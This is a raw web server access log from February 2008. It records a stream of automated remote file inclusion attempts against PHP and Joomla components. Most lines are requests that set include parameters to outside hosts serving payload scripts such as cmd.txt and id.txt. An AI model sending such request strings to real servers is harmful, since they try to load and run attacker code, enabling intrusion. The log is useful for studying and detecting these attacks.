80.82.132.50 - - [19/Feb/2008:08:35:45 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.68.37 - - [19/Feb/2008:08:35:55 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://eagles-tailgate.com/gallery/albums/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.68.37 - - [19/Feb/2008:08:35:55 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://eagles-tailgate.com/gallery/albums/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:08:35:55 -0800] "GET /logs/access_080121.log/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:08:35:56 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:36:42 -0800] "GET /logs/access_080112.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:08:36:52 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:08:36:52 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:08:36:53 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:08:36:53 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:08:36:57 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:08:36:57 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:08:36:57 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:08:36:57 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:08:36:58 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:08:36:58 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
78.111.68.37 - - [19/Feb/2008:08:37:17 -0800] "GET /logs/access_080126.log/components/com_performs/performs.php?mosConfig_absolute_path=http://eagles-tailgate.com/gallery/albums/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:08:37:33 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.31.183.74 - - [19/Feb/2008:08:37:34 -0800] "GET /logs/access_080108.log//convert/mvcw.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [19/Feb/2008:08:37:34 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [19/Feb/2008:08:37:34 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [19/Feb/2008:08:37:41 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.sitilinux.genova.it/whois/images/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:37:42 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:37:42 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:37:42 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [19/Feb/2008:08:37:50 -0800] "GET //include.php?path[docroot]=http://www.sitilinux.genova.it/whois/images/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.241.168.186 - - [19/Feb/2008:08:37:55 -0800] "GET /logs//include.php?path[docroot]=http://www.sitilinux.genova.it/whois/images/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
81.223.20.29 - - [19/Feb/2008:08:37:58 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.223.20.29 - - [19/Feb/2008:08:37:58 -0800] "GET //include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.223.20.29 - - [19/Feb/2008:08:37:59 -0800] "GET /logs//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.58.184.150 - - [19/Feb/2008:08:38:10 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [19/Feb/2008:08:38:11 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:08:38:23 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:38:25 -0800] "GET /logs/access_080121.log//components/com_forum/download.php?phpbb_root_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:38:25 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:38:25 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:08:38:50 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:08:38:51 -0800] "GET //include.php?path[docroot]=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:08:38:51 -0800] "GET /logs//include.php?path[docroot]=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:38:52 -0800] "GET /logs/access_080108.log//convert/mvcw.php?step=1&vwar_root=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:38:53 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:38:53 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:08:39:02 -0800] "GET /logs/access_080203.log//convert/mvcw.php?step=1&vwar_root=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:08:39:27 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:08:39:34 -0800] "GET /logs/access_080121.log/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:08:39:34 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:08:39:55 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:08:39:55 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:41:06 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:41:16 -0800] "GET /logs/access_080121.log/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:41:16 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:41:23 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:41:24 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:41:24 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
158.38.0.218 - - [19/Feb/2008:08:41:25 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
158.38.0.218 - - [19/Feb/2008:08:41:25 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
158.38.0.218 - - [19/Feb/2008:08:41:26 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://cnim.3x.ro/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
158.38.0.218 - - [19/Feb/2008:08:41:26 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://cnim.3x.ro/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:42:29 -0800] "GET /logs/access_080126.log/components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.189.208.72 - - [19/Feb/2008:08:42:42 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
218.189.208.72 - - [19/Feb/2008:08:42:42 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
218.189.208.72 - - [19/Feb/2008:08:42:42 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
218.189.208.72 - - [19/Feb/2008:08:42:42 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.232.108.82 - - [19/Feb/2008:08:43:09 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.200.153 - - [19/Feb/2008:08:43:22 -0800] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.47.200.153 - - [19/Feb/2008:08:43:22 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:08:43:55 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:10 -0800] "GET /logs/access.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:11 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:11 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:13 -0800] "GET /logs/access_080106.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:25 -0800] "GET /logs/access_071202.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:26 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:26 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:08:44:27 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.132.50 - - [19/Feb/2008:08:44:28 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.15.138 - - [19/Feb/2008:08:44:40 -0800] "GET //include.php?path[docroot]=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.19.15.138 - - [19/Feb/2008:08:44:40 -0800] "GET /logs//include.php?path[docroot]=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:44:52 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [19/Feb/2008:08:44:52 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.117.180 - - [19/Feb/2008:08:45:16 -0800] "GET /redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
69.94.117.180 - - [19/Feb/2008:08:45:22 -0800] "GET /logs/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:08:46:24 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:08:46:24 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [19/Feb/2008:08:47:11 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [19/Feb/2008:08:47:11 -0800] "GET //include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [19/Feb/2008:08:47:12 -0800] "GET /logs//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:47:23 -0800] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:47:24 -0800] "GET /logs/access_071216.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:47:24 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:47:24 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:47:24 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:47:25 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.184.150 - - [19/Feb/2008:08:47:33 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.31.183.74 - - [19/Feb/2008:08:47:40 -0800] "GET /logs/access_080131.log//convert/mvcw.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:47:46 -0800] "GET /logs/access_071212.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:08:47:48 -0800] "GET //tools/send_reminders.php?includedir=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:08:47:48 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:48:38 -0800] "GET /logs/access_080129.log//?dir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:48:40 -0800] "GET //?dir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:08:48:41 -0800] "GET /logs//?dir=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 35992 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:49:04 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:49:05 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.195.35 - - [19/Feb/2008:08:49:05 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:08:49:24 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [19/Feb/2008:08:49:31 -0800] "GET /redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.88.23.149 - - [19/Feb/2008:08:49:31 -0800] "GET /logs/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:50:22 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [19/Feb/2008:08:50:23 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.107 - - [19/Feb/2008:08:50:32 -0800] "GET /logs/access.log HTTP/1.0" 200 473200 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.34.68.128 - - [19/Feb/2008:08:50:37 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
